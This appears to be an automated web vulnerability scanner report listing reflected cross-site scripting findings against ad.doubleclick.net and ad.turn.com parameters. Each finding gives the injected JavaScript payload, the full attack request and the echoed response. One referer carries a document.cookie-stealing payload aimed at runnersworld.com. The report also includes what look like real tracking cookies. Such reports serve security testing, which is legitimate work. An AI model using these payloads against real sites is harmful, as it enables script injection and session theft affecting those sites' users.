GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE9509f"-alert(1)-"6749c3c0d7d&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:23 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE9509f"-alert(1)-"6749c3c0d7d&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

2.4. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2c8"-alert(1)-"1f32606eed2 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-40638789337809121e2c8"-alert(1)-"1f32606eed2&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:45:26 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:45:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37216

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
pbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-40638789337809121e2c8"-alert(1)-"1f32606eed2&adurl=";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1296257752903.uniqueId;
this.thirdPartyImpUrl = "";

...[SNIP]...

2.5. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29875"-alert(1)-"c5c47c97bbe was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=129875"-alert(1)-"c5c47c97bbe&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:44 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
RABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=129875"-alert(1)-"c5c47c97bbe&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

2.6. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebe5e"-alert(1)-"7b2a3fedccd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ugebe5e"-alert(1)-"7b2a3fedccd&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:45:05 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:45:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
sf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ugebe5e"-alert(1)-"7b2a3fedccd&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

2.7. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7470"-alert(1)-"05fd012cf34 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lb7470"-alert(1)-"05fd012cf34&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:13 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ac6/f/194/%2a/e%3B235864053%3B1-0%3B0%3B59652986%3B3454-728/90%3B39730864/39748651/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb7470"-alert(1)-"05fd012cf34&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4
...[SNIP]...

2.8. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de360"><script>alert(1)</script>924b327da15 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=de360"><script>alert(1)</script>924b327da15 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=gBDNuKNyKsl9Odgd8wAsQTKysbuTZf2s5M5FD_CAAB7DlGIUOWYS4TNj-1gj_Xcu6CYQDDQa1VL94yX_MoGpV_GUt1ksyvX1In61OuSwLt10u9X24kO-JCULGTAtCiI82oACfqCIYQ-ERdvzbQ_bSmzG5dlloET5SP593yLAYUYzCAmv0Bkl4LE-5xiOhqqU5hzUx6VAO2k6m2QQxK9K08oG9BkcazYcP_2TrcEOQP3WiKBAOiVD6755T8m0f3BSo_YLr4EKIQlY-CdWF8ITS28_IvRz2JEsIjhRKl0lPa2LXPx_rEG03BIJwC5BX6NRjN1OhEClvNCotpoUoTVc7xvpANZVmAjLpguK-shoxo4dbNA6MY7kRMgbXMy-D477nELWUQ0Rw535KLqcq4q__J8WOoC21eSuP4JNkyvRABQFijVgU7PXn0jHxkPCNv4bOyUPC9Fpm7etzgvO_fmrPkooj63m4sjCGxUC0pM2SLiq9bBec_QkIP-JoLdM2w1VhZ21JrK1wBbfUDbEfzxZmaJD4c5aSaK33YzyKwwYBCqCQPyKSyeLLFNGI5yEMkfIKVPRVzGG23OkJv5AMKUTaqg_u8mtM46FV1h3QfJdTZWUFE9U6EKcwdjYdcVNUkvIeogMyqtOxBjt39bKPXzgmmxBsnrLbTgBzBVNImszQJKvw9LgipyjPoHCcfZrpUai4JLuayTba8oiNq_XhSPmwx5GmgUQyfnbOd2w3kmx8qvNHk6KDzwAPsyOISbfg6MfRpzV7LM6J13WDlxXaw0dwtaogoecLkh5Gdwzns6PR3AwgCiTm-xPyon8eQDhlKvugIXAKcMPhEbqI-V9Sv3eooMsNg36di6E49Nomd6jTU9egCSRMS98UFVNYjVtQ4urBK3FjPWZ3Di0FOD2Kcxr-k0OB82HjViKXqLuoMNTyWQcXhNTrz3mr8sow7iQNpitGHAyXWEYyGBykEoLQhmrWNoPJC71oS0hJqlJnrpnGFhJzhvWSyFYd2BWpLKYJlg6-W5HTVi_oOco4RQh7z9_-JaW43Pz5VN0dvHJoxbNVZ97tpG9XttSdPWXi0z6Jg6IsnTvMmWWDNqbkX3hH8mhIYBK7MGRBOeR1YzcCeyMpDmJ0VuAHXPcV73Qns4O__Jj2lJ6ZKhH3VM3BvZ2PJZeyo_K_w_o-V6MIHko5ImHHJbecjI5VdlIWmt54cjQRcHYMQPwiCOVkrMyS-0aX55fmlk35l0spUAw8t8ZqIkxNj8MPYazz3rO03ATWFwaY5i7iStqAsWbZ7YUH8GSY7-t_J4r25-aiikPN2qEVv7TRiqUvlZaM8XFIBijkSFeg2zGD4fdRlNM5LTzq4xWE1ZK--LAz8MzOM-C6CDT3q-ifKpEezhVQTYte5F3-FeYiKlQRaZz7xWCD_yX14N-tT3hfO0kAXszpV0W1GkBMMS3Gw0HTCum57pWAGCiPcC_Z3qGFfLVq6mopJGWBFdzU_rmPxWIBEzIt_I5ABOElN7-o1N0L93nQNnHmE-8Xu8-ECY9xLe3lcSfWb-KhRGhyVysbsZk7iyEoz8zA3JQ2C9OfjxiW2aYr0a3K5tIEMzcXQPpur3bq3Thm6_2RS_S2g9W_7fY1zc1K0WPlL98x7sL6KENQXMr7tOj0tStdl9JeUiMHFtb__DUdwj-uP98hpbTt4roaMGQuQnD9agQHp-xH4Jafs6FBmb98eQD_cOP3DvEMi6XhBSdavl4LR2MIjmTF0mh_AG_jc7gjylPqQCeipADH7ZUYz5xSIAGz8ZVdz_gI_tGwcmLB8JEgvxf4yceK-ytsejiDtfYk-vq9YFwucMhc7pp4fbrfTAG1AhqWCVhGwlgeOqlB-BkyxJ1zDSGE0snnnxI1S7YTiuj-fGScF4oQVIZccBuiROOGCDUYKGlYL_kqGR8obvHHZk267UOKXgsCO18tJuj14RjnfWV9JCCZksmnBPhOpWQIIbDrQeMFzQrFDQzzgYAL9AjXWyagDxRnYrN-9pjuSYDN0EVr-A1pVfxWPrW29xmD_ZeGx-AE82rXSYVcjz2J0squiYwC1lSTDghv5hxN42WTZrbBPUWmCi_6M18neu_Vazros1bDD1RMNP69o628EHNgUTgy0PfHqtb-SYVZWNt6hO30_te5Eiua7R-LT6r8oudwmlo4u1rDUlsabP08_i0966mykYBmvFZvHLkAa30wkjTumfXaFDIfbonZq657eoULxrE0KDvfmac-lNvjOsoiUlf13KH2StPZs3JjeWcrw3FmAmZ_RtseJ6xozjuP7ZdQwIEpp8nLCbAQOxgA2x5FvD72qZzxdn2BHj2pHFYtOY7bzwWmWsNvLyU_XSNqO1BDG83X80DgytqEg90YRZxOOi-Q0rmjkPfMOEIgGA-K9y-Zc4tR7KRJlpJ4PlVYxVaMvB1wYPNMfFs382zN0o7uzcPmdNK1_b3Ua6Vc0GyYGzFgDpNxONxibEN5pV6-d_sBzVLRBMFYCWf6caSG4LvO5wFQK5rWe8X_fTtzfSXBh6egF0Rwa3OCNWzkU-61-zDsHD8uqSEGm_zHYk1Lx3D3zdxfoViaQ2DOWdSRXMqAXHjE1bj46PH61xKbR-SCeq4p4CAvfxI-56aT45lrDgMry2PNxuYVt3awaDu13VvFwpGzs06VQoe4DVxSHVvfrsSQMYWsxPY7alAyM08Y81chhsaFrvpqC9YhigzHku7t4ADij4Bw7EVtWzromyqquGZ7KVTTEQszed-lC1fMtCjU1z2xJ1CnZG4LQk8JxaWG0f85jA_1_EgfGzLymJqXqxDkl_z6MLzU6M9nX4-GUSLU2nvHNtoJlouXD8ZYi9DnZrOv6fUoZGFDgLSYVRUaQ-Wqmj3Tei_CdEkIQzkhmYyekerLrx9FrOtoxmBIEIaEp5KqP8jd88N4SLrpWX75qPcPWilpSsIABAYe0PnXbtU01VUbzTE76SN2br5p6VEXJlHEcVqa7s7pI24wvVlZWelsG_swcmrkZNllXiyt69BIY5KH70UEviYerZeVNNKkpbsXiR6Sun3kKaXxA7raRqYLrVBWPKJ4cYHaESEng8GxJ7c7_83qI2KkIKG8gPGwoFkVm7IMVTuQueBCC8E-DRc1jh5bznh7BOOaG3LFaFrDxbQguDVYtQ8E9kG41oci0hMyGPNDNYChhIU2SM-p93HtlelH6k8ZGZ9nInahZ1BmsDoTBButUd9vgmil7cXXXfT6KV3aaEupqcZ9U4B3wCLwXiaLjGOznKQN2fXE5YYm2elYiZf3N9hm3IU4-yhSvbDCYg23HEA0KbM-xv4ELaLtSRShf0UMkiZR4NHAE0AveeA8Od6uUEN_o-A1cEo1GBBE34wNgkMQOaX-ISsqxHKtScufiDGDFsr9zy3Wkv1Du64b3_CXR0nvouK2wr8mFPHCrur0quGluzBKZVWVHUrVyrSTcpi1qL8jLHo7PL51CfPsP5BkHuAnw4dd_nuCuXKeeOhPEegXpshkW-21H-LVw_kXbBwJ1IK5XZLAb-8EOvYR-BHV151XTPMJca60BfG9XaYHcjUsne2Ci3TfaGg1576UZ7-P2Tufjq7ydXKpAG1gOCnsXVPO2QWKa2hO56wnpU2kdj1scl_syvmA6j_Le8O; fc=bFQxMilhpzlWLYP_sXBtIYFmw5EWfjbh1eOA1sz7ZRCXg1SDiQ1wNQPvEsHDR6r4QRgl2iHtGb0XSne6Zh5vRr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; rrs=undefined%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7Cundefined%7C12; rds=undefined%7C15038%7C15038%7C15040%7Cundefined%7C15038%7C15038%7C15038%7C15038%7C15038%7C15039%7C15039%7Cundefined%7C15039%7Cundefined%7C15038; rv=1; uid=8392341830659049202; pf=2dy1dfRhJs-YELtwZsFipd2Q0WpRShVuTai2eGzATQXbTkFpgCGAsBUDX1lejLCOR5RMeCwKggjWXFPcmgjoVaVrMHNz69PQaa43GVLHMAhUSfvVuGydQIdBMZHnuDislLDHspzhTzFsVvdpNNxtj1TwZsGxYDrojBQcX4SzgoUPRtJJrJCkPJ19RLntPbWuVElzdE8iQNcR2EX18MZOehaWANzM9K51ZAJeZ2JML9Bhc83I5SF__AukTuB2ekB87BpYSwFBeihWaIMeEUa2IvSDYVe3hgq5no4nY-zsklVdl9bH_d_PoDuU3LoB11-dEe6-apwy5F8opaz7NB9fMxyiGG7W2xuBvf-vbv-Xy_8HiyH59Ab7hXp8vDXz4mwww8yVG-RXFIQCjN94aUN2WNdGtecxcKbowzItSpEchaR2vHgI_YvpK-yPFSQwk6X28oWfJ2ABsI_HZq8kn3Kw5sgCuZrZckZila5SojXxmRF2uSSHjcdvI4iAXyEa431UPeGSaMCrvSqzXNaJFuoXW-kL2cCZnqhG6GGhR0kiCV0rDu1HvYOqcQLOUlBgN0JAYsJElj9Y83gaOa3OhfsCmuVMDTjIBYS8D-V1Auqq6zcs_kWtc7lTCoJNKPCT11aeUx3JVtaQpjqwE9Cq-LU0W97H4IvJFJQADrD8pqGRHfUARjkJ2YqQ3HohDVxKU638wJdC14RvTJGZJ8_7I3-Cjfj-eoImMIFKC9iGehTkwam4P0G1FPqrhI13GnBDeFcARlNNYA8VZYJj2Gg_p1LSg1qqJUVZfRXXsqWOCbbO1xBl-UrBM1D6w4MWmKotM-pp1Er5i